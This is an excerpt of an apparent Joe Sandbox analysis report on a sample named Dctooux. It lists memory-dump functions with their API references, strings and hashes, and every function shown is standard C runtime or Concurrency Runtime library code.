GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00A6E45C), ref: 00A6E4A6
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00A6E4B8
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00A6E4C6
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00A6E45C), ref: 00A6E4E9
___scrt_fastfail.LIBCMT ref: 00A6E4FA
DeleteCriticalSection.KERNEL32(00AB8640,00000007,?,?,00A6E45C), ref: 00A6E505
CloseHandle.KERNEL32(00000000,?,?,00A6E45C), ref: 00A6E515

Strings

kernel32.dll, xrefs: 00A6E4A1
WakeAllConditionVariable, xrefs: 00A6E4BE
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00A6E490
SleepConditionVariableCS, xrefs: 00A6E4B2

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 3578986977-3242537097
Opcode ID: b51995708dec25e0e81e452c54c7e5221c65ae49203a7c460c4757fb0fa825a2
Instruction ID: c9d0e999e7d0386465997770109ee00c05be73e0c39fdb72fab528f6016e7c66
Opcode Fuzzy Hash: b51995708dec25e0e81e452c54c7e5221c65ae49203a7c460c4757fb0fa825a2
Instruction Fuzzy Hash: 5D014C75A40313BBDA20DBFDAC1DB6A7768BB42B417058614F905D22E0EF648812CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A83B1E Relevance: 22.7, APIs: 15, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00A83B30

Part of subcall function 00A8392E: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00A83951

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00A83B51
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00A83B5E
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 00A83BAC
Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 00A83C33
Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 00A83C46
Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 00A83C93

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
String ID:
API String ID: 2530155754-0
Opcode ID: 77c117cb3d7aff0aa70701bd34eea4af2b77fa6e09a2ec76ad8bb61f2046ae5c
Instruction ID: b5aefabf20e0f99a4dd149556907540c95e78bbe44d30f94cc0b44579bef9694
Opcode Fuzzy Hash: 77c117cb3d7aff0aa70701bd34eea4af2b77fa6e09a2ec76ad8bb61f2046ae5c
Instruction Fuzzy Hash: D281DF72804249ABDF12EF54CA45BFE7FB2AF05B04F044098FC416B292C7768E29DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A7592E Relevance: 21.2, APIs: 14, Instructions: 189
timeregistryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ListArray.LIBCONCRT ref: 00A75988

Part of subcall function 00A75769: InitializeSListHead.KERNEL32(?,?,00000000,?,?), ref: 00A75835
Part of subcall function 00A75769: InitializeSListHead.KERNEL32(?), ref: 00A7583F

ListArray.LIBCONCRT ref: 00A759BC
Hash.LIBCMT ref: 00A75A25
Hash.LIBCMT ref: 00A75A35
InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 00A75ACA
InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 00A75AD7
InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 00A75AE4
InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 00A75AF1

Part of subcall function 00A7B091: std::bad_exception::bad_exception.LIBCMT ref: 00A7B0B3

RegisterWaitForSingleObject.KERNEL32(?,00000000,00A78E65,?,000000FF,00000000), ref: 00A75B79
Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00A75B9B
GetLastError.KERNEL32(00A768DB,?,?,00000000,?,?), ref: 00A75BAD
Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 00A75BCA

Part of subcall function 00A70FFA: CreateTimerQueueTimer.KERNEL32(?,?,00000000,?,?,00A768DB,00000008,?,00A75BCF,?,00000000,00A78E56,?,7FFFFFFF,7FFFFFFF,00000000), ref: 00A71012

Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A75BF4

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: List$HeadInitialize$Timer$ArrayCreateHashQueueRegister$AsyncConcurrency::details::Concurrency::details::platform::__Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastLibraryLoadObjectSingleWaitstd::bad_exception::bad_exception
String ID:
API String ID: 2750799244-0
Opcode ID: 0daec51c5fde1da87088abcebd4be60637fb55bd062989bb718be1266f62deb1
Instruction ID: 4acda138c712843995ecbe4976647d4968ff97ebefb7474ed7fa55a23d515af2
Opcode Fuzzy Hash: 0daec51c5fde1da87088abcebd4be60637fb55bd062989bb718be1266f62deb1
Instruction Fuzzy Hash: C2812EB0A11A52FED718DF788D45BD9FBA8BF09700F10821AF52D97281DBB4A560CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00A9073F Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00A90783

Part of subcall function 00A9031C: _free.LIBCMT ref: 00A90339
Part of subcall function 00A9031C: _free.LIBCMT ref: 00A9034B
Part of subcall function 00A9031C: _free.LIBCMT ref: 00A9035D
Part of subcall function 00A9031C: _free.LIBCMT ref: 00A9036F
Part of subcall function 00A9031C: _free.LIBCMT ref: 00A90381
Part of subcall function 00A9031C: _free.LIBCMT ref: 00A90393
Part of subcall function 00A9031C: _free.LIBCMT ref: 00A903A5
Part of subcall function 00A9031C: _free.LIBCMT ref: 00A903B7
Part of subcall function 00A9031C: _free.LIBCMT ref: 00A903C9
Part of subcall function 00A9031C: _free.LIBCMT ref: 00A903DB
Part of subcall function 00A9031C: _free.LIBCMT ref: 00A903ED
Part of subcall function 00A9031C: _free.LIBCMT ref: 00A903FF
Part of subcall function 00A9031C: _free.LIBCMT ref: 00A90411

_free.LIBCMT ref: 00A90778

Part of subcall function 00A8C1D5: HeapFree.KERNEL32(00000000,00000000,?,00A904AD,?,00000000,?,?,?,00A904D4,?,00000007,?,?,00A908D6,?), ref: 00A8C1EB
Part of subcall function 00A8C1D5: GetLastError.KERNEL32(?,?,00A904AD,?,00000000,?,?,?,00A904D4,?,00000007,?,?,00A908D6,?,?), ref: 00A8C1FD

_free.LIBCMT ref: 00A9079A
_free.LIBCMT ref: 00A907AF
_free.LIBCMT ref: 00A907BA
_free.LIBCMT ref: 00A907DC
_free.LIBCMT ref: 00A907EF
_free.LIBCMT ref: 00A907FD
_free.LIBCMT ref: 00A90808
_free.LIBCMT ref: 00A90840
_free.LIBCMT ref: 00A90847
_free.LIBCMT ref: 00A90864
_free.LIBCMT ref: 00A9087C

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 7f2ef2baeb8c2911ebb946fb3c872fc2d014b87841fc398521881fb4bd9ca549
Instruction ID: 40124980a579c423f2459dd167e5dbd11a44a86dac7a5ad8d45c615e8c446931
Opcode Fuzzy Hash: 7f2ef2baeb8c2911ebb946fb3c872fc2d014b87841fc398521881fb4bd9ca549
Instruction Fuzzy Hash: 69316971701605AFEF20AB79D989F5677E8AF003B0F248929F959D7192DE70EC808F60

Uniqueness

Uniqueness Score: -1.00%

Function 00A866F5 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 308COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 00A867F0
type_info::operator==.LIBVCRUNTIME ref: 00A86817
___TypeMatch.LIBVCRUNTIME ref: 00A86923
CatchIt.LIBVCRUNTIME ref: 00A86978
IsInExceptionSpec.LIBVCRUNTIME ref: 00A869FE
_UnwindNestedFrames.LIBCMT ref: 00A86A85
CallUnexpected.LIBVCRUNTIME ref: 00A86AA0

Strings

csm, xrefs: 00A86730
csm, xrefs: 00A8684E
csm, xrefs: 00A8679D

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4234981820-393685449
Opcode ID: feda6dbf6f79dea38be7ec2d71ae4f16abe0996e800d8d7b5a11745649533511
Instruction ID: 1026c62018afd0ff4b1ba287b9d45527f22d01b33687895f2839c2c953c4957d
Opcode Fuzzy Hash: feda6dbf6f79dea38be7ec2d71ae4f16abe0996e800d8d7b5a11745649533511
Instruction Fuzzy Hash: 8EC16D71C00219EFEF29EFA4CA819AEBBB5FF18310F14415AE815AB252D731DA51CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A5BB00 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 130comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00A5BB67
CoCreateInstance.OLE32(00AAB330,00000000,00000001,00AAB340,?), ref: 00A5BB83
CoUninitialize.OLE32 ref: 00A5BB91
CoUninitialize.OLE32 ref: 00A5BC50
CoUninitialize.OLE32 ref: 00A5BC64

Strings

, xrefs: 00A5C79A
stoi argument out of range, xrefs: 00A5F3DA
invalid stoi argument, xrefs: 00A5F3E4
(, xrefs: 00A5C83B

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Uninitialize$CreateInitializeInstance
String ID: $($invalid stoi argument$stoi argument out of range
API String ID: 1968832861-2618398775
Opcode ID: 9b16b2532a80bab5ff43fd9c401788f6fdfc601ada738db081591d65415a0942
Instruction ID: e1adfaeb0de04bb2c895dc43429bb29ed7cb9e4a729e34f9f12211caab822ad1
Opcode Fuzzy Hash: 9b16b2532a80bab5ff43fd9c401788f6fdfc601ada738db081591d65415a0942
Instruction Fuzzy Hash: EF418E71A10109AFDF04CFA9CC85BAE7BB9FB49712F104518F805EB691DB74A944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A8B939 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00A8B94F

Part of subcall function 00A8C1D5: HeapFree.KERNEL32(00000000,00000000,?,00A904AD,?,00000000,?,?,?,00A904D4,?,00000007,?,?,00A908D6,?), ref: 00A8C1EB
Part of subcall function 00A8C1D5: GetLastError.KERNEL32(?,?,00A904AD,?,00000000,?,?,?,00A904D4,?,00000007,?,?,00A908D6,?,?), ref: 00A8C1FD

_free.LIBCMT ref: 00A8B95B
_free.LIBCMT ref: 00A8B966
_free.LIBCMT ref: 00A8B971
_free.LIBCMT ref: 00A8B97C
_free.LIBCMT ref: 00A8B987
_free.LIBCMT ref: 00A8B992
_free.LIBCMT ref: 00A8B99D
_free.LIBCMT ref: 00A8B9A8
_free.LIBCMT ref: 00A8B9B6

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 42f0df7d31b97944cc819547aa12009bcd61fe0ae2a8507b025a62ab27fb78a3
Instruction ID: 93d961d300356274560b4eb71334ba75d052eb507db6868e0d4fbde0aa66232e
Opcode Fuzzy Hash: 42f0df7d31b97944cc819547aa12009bcd61fe0ae2a8507b025a62ab27fb78a3
Instruction Fuzzy Hash: 7A21A7B695110CAFCB05EF94C985DDD7FB8AF08360B0041A5FA159B162DB31EA448F90

Uniqueness

Uniqueness Score: -1.00%

Function 00A787B4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 80threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00A78800
SwitchToThread.KERNEL32(?), ref: 00A78823
Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00A78842
Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 00A7885E
Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00A78869
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A78890

Strings

count, xrefs: 00A787CE
ppVirtualProcessorRoots, xrefs: 00A78888

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementSwitchThreadstd::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 3791123369-3650809737
Opcode ID: a6b2198d6b5efc4c50e54c2b9cc7c6c7e902629dda3b0eec7525eff7437daf5e
Instruction ID: e9e0210490786024f0e1384cd3dd0229f9009ecd64f9c9cc2400b2652f86989a
Opcode Fuzzy Hash: a6b2198d6b5efc4c50e54c2b9cc7c6c7e902629dda3b0eec7525eff7437daf5e
Instruction Fuzzy Hash: 78218534E00209AFCF04EF99C999AAD77B5BF59340F54C0A9E40997251DB34AE05CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A7826C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00A78286
GetCurrentProcess.KERNEL32 ref: 00A7828E
DuplicateHandle.KERNEL32(00000000,000000FF,00000000,00000000,00000000,00000000,00000002), ref: 00A782A3
SafeRWList.LIBCONCRT ref: 00A782C3

Part of subcall function 00A762BE: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00A762CF
Part of subcall function 00A762BE: List.LIBCMT ref: 00A762D9

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A782D5
GetLastError.KERNEL32 ref: 00A782E4
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A782FA

Strings

eventObject, xrefs: 00A782CD

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorHandleLastLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
String ID: eventObject
API String ID: 165577817-1680012138
Opcode ID: f856bb28626999d0f4aeee1ff508da6eb414f6add155a69f09ea8860652c9ad4
Instruction ID: 7d560bd8f46e6017c681361892ffa6594c31a68f6c3a9620fbdea56871aa73fa
Opcode Fuzzy Hash: f856bb28626999d0f4aeee1ff508da6eb414f6add155a69f09ea8860652c9ad4
Instruction Fuzzy Hash: CA11E032540205EBCB10EBA4CD4EFEE3378AB04751F20C115B51AA60D2EF749A45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00A96AB2 Relevance: 13.8, APIs: 9, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b884846843c17557ad34aa6a01ce057b93e2021b19b63cbf7649580ca1071065
Instruction ID: c01b89a757a1074ea968c257526915525c1bff5c51234938fc590d184b7a575e
Opcode Fuzzy Hash: b884846843c17557ad34aa6a01ce057b93e2021b19b63cbf7649580ca1071065
Instruction Fuzzy Hash: D9C11FB4F04646AFDF15DFA8C980BBDBBF1AF49310F144158E424AB2A2DB749D42CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A5EAD0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 185COMMON

Download Yara Rule

Strings

list too long, xrefs: 00A5EF8D

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: mtx_do_lock
String ID: list too long
API String ID: 1389037287-1124181908
Opcode ID: 384962ff18e0acf2a31b23ca50dd9815321cc412d1b96cc71ca0d4dbe538e257
Instruction ID: f047e290c63a23d78a7a16872547f9c5d4966db27684ccdde10887cf8809fb7a
Opcode Fuzzy Hash: 384962ff18e0acf2a31b23ca50dd9815321cc412d1b96cc71ca0d4dbe538e257
Instruction Fuzzy Hash: 7B61A1B0D04718ABDB10DF64CD49B9AB7B8FF14300F0042AAE90DA7291E771AA95CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00A7FBFF Relevance: 10.6, APIs: 7, Instructions: 102COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 00A7FC27

Part of subcall function 00A7F994: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 00A7F9C7
Part of subcall function 00A7F994: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 00A7F9E9

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00A7FCA4
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 00A7FCB0
Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 00A7FCBF
Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 00A7FCC9
Concurrency::location::_Assign.LIBCMT ref: 00A7FCFD
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00A7FD05

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
String ID:
API String ID: 1924466884-0
Opcode ID: ec9ad7a833d03d65eb186c466ae352160fbdd81f744dd8b37e8f0381d6b0c7ea
Instruction ID: c358f59af8abbc78b51268a39d187aa6811a567fa96b111f7f72d6b4afbd2ade
Opcode Fuzzy Hash: ec9ad7a833d03d65eb186c466ae352160fbdd81f744dd8b37e8f0381d6b0c7ea
Instruction Fuzzy Hash: E2411935A002089FCF05EF64C894BADB7B5BF49314F54C0A9ED599B286DB34AA41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A904BB Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A90483: _free.LIBCMT ref: 00A904A8

_free.LIBCMT ref: 00A90509

Part of subcall function 00A8C1D5: HeapFree.KERNEL32(00000000,00000000,?,00A904AD,?,00000000,?,?,?,00A904D4,?,00000007,?,?,00A908D6,?), ref: 00A8C1EB
Part of subcall function 00A8C1D5: GetLastError.KERNEL32(?,?,00A904AD,?,00000000,?,?,?,00A904D4,?,00000007,?,?,00A908D6,?,?), ref: 00A8C1FD

_free.LIBCMT ref: 00A90514
_free.LIBCMT ref: 00A9051F
_free.LIBCMT ref: 00A90573
_free.LIBCMT ref: 00A9057E
_free.LIBCMT ref: 00A90589
_free.LIBCMT ref: 00A90594

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
